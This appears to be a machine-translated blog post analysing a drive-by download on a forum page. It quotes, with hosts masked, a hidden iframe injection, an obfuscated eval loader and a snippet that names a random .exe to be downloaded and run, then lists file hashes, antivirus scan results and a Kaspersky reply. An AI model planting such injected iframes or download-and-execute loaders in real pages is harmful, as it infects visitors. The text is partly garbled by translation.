Down.exe/virus. win32.autorun. Z/Trojan. PWS. maran.262

Down.exe/virus. win32.autorun. Z/Trojan. PWS. maran.262

EndurerOriginal
2Added replies from Kaspersky.
1Version

When you open a page that is occasionally used in the Forum, rising prompts you to download and run suspicious files.

Search by Google, and Google has already marked it:
Http://www.google.cn/search? Complete = 1 & HL = ZH-CN & newwindow = 1 & Q = % E8 % BF % 98% E7 % 8f % A0 % E5 % 8C % Ba + % E6 % 97% A7 % e9 % 9B % A8 % E6 % a5 % BC % E6 % B8 % 85% E9 % A3 % 8e % E9 % 98% 81 & meta =

Check the webpage code and add it:
/---
<IFRAME src = hxxp: // I **. x *** in ** 8.info/wm.htm width = 1 Height = 1> </iframe>
---/

Hxxp: // I ***. x *** in *** 8.info/wm.htmCode included:
/---
<SCRIPT src = 0614.js> </SCRIPT>
---/

Hxxp: // I **. x ** in ** 8.info/0614.jsContent:
/---
Eval ("/146/165/156/143 /... (Omitted )... /146/75/61/73/175 ")
---/

After two decryption, the original code is obtained. The function is to download down.exe and save it to % WINDIR %. The file name is defined by the UDF:
/---
Function qk45u3 (rm4mf) {var m0qnw = Window ["math"] ["random"] () * rm4mf; return math1_1_round1_1_1_(m0qnw1_1_1_'.exe ';}
---/
That is, ***. EXE, where * is a number, and runs through cmd.exe/C.

File Description: D:/test/down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19602 bytes, 19.146 KB
MD5: a329a121353d80b9871119788f7b14c7

Nspack 1.3-> North Star/Liu Xing Ping

 

File down.exe received at 09:14:12 (CET)
Current status: Completed

Anti-Virus engine	Version	Last update	Scan results
AhnLab-V3	2007.7.28.0	2007.07.27	Win-Trojan/hupigon. gen
AntiVir	7.4.0.50	2007.07.27	TR/agent.19602
Authentium	4.93.8	2007.07.27	Possibly a new variant of W32/threat-hllin-slipper-based! Maximus
Avast	4.7.997.0	2007.07.27	Win32: Small-AMI
AVG	7.5.0.476	2007.07.27	Downloader. generic5.eca
BitDefender	7.2	2007.07.28	Genpack: Generic. malware. wbdld.92022134
Cat-quickheal	9.00	2007.07.26	(Suspicious)-dnascan
ClamAV	0.91	2007.07.28	-
Drweb	4.33	2007.07.27	Trojan. PWS. maran.262
Esafe	7.0.15.0	2007.07.24	Suspicious Trojan/Worm
ETrust-vet	31.1.5010	2007.07.28	-
Ewido	4.0	2007.07.27	-
Fileadvisor	1	2007.07.28	-
Fortinet	2.91.0.0	2007.07.28	-
F-Prot	4.3.2.48	2007.07.27	W32/threat-hllin-slipper-based! Maximus
F-Secure	6.70.13030.0	2007.07.27	W32/hupigon. gen67
Ikarus	T3.1.1.8	2007.07.27	Backdoor. win32.agent. ahj
Kaspersky	4.0.2.24	2007.07.28	-
McAfee	5085	2007.07.27	-
Microsoft	1.2704	2007.07.28	-
Nod32v2	2426	2007.07.27	A variant of Win32/trojandownloader. Delf. NSA
Norman	5.80.02	2007.07.27	W32/hupigon. gen67
Panda	9.0.0.4	2007.07.28	Generic Trojan
Rising	19.33.42.00	2007.07.27	-
Prevx1	V2	2007.07.28	W32.malware. gen
Sophos	4.19.0	2007.07.26	Mal/packer
Sunbelt	2.2.907.0	2007.07.28	Vipre. Suspicious
Symantec	10	2007.07.28	-
Thehacker	6.1.7.155	2007.07.28	-
Vba32	3.12.2.1	2007.07.27	Malwarw.Trojan-PSW.Game.14
Virusbuster	4.3.26: 9	2007.07.27	-
Webcycler-Gateway	6.0.1	2007.07.28	Trojan. agent.19602

Additional information

File Size: 19602 bytes

MD5: a329a121353d80b9871119788f7b14c7

Sha1: cd849c87c62a23adc01b3d9c1b3c1e5b848faa03

Prevx info: http://fileinfo.prevx.com/fileinfo.asp? Px5 = cbb0e79992c2fa964c9000f9f5065b00efb6d5a7

Sunbelt info: vipre. Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

Subject:	Re: [KLAB-2516758]
Sender:	"" <Newvirus@kaspersky.com>	Sent at: 16:16:38

Hello.

Virus. win32.autorun. Z

New malicious software was found in the attached file.

It's detection will be removed in the next update. Thank you for your help.

-----------------

Regards, Yury nesmachny

Virus analyst, Kaspersky Lab.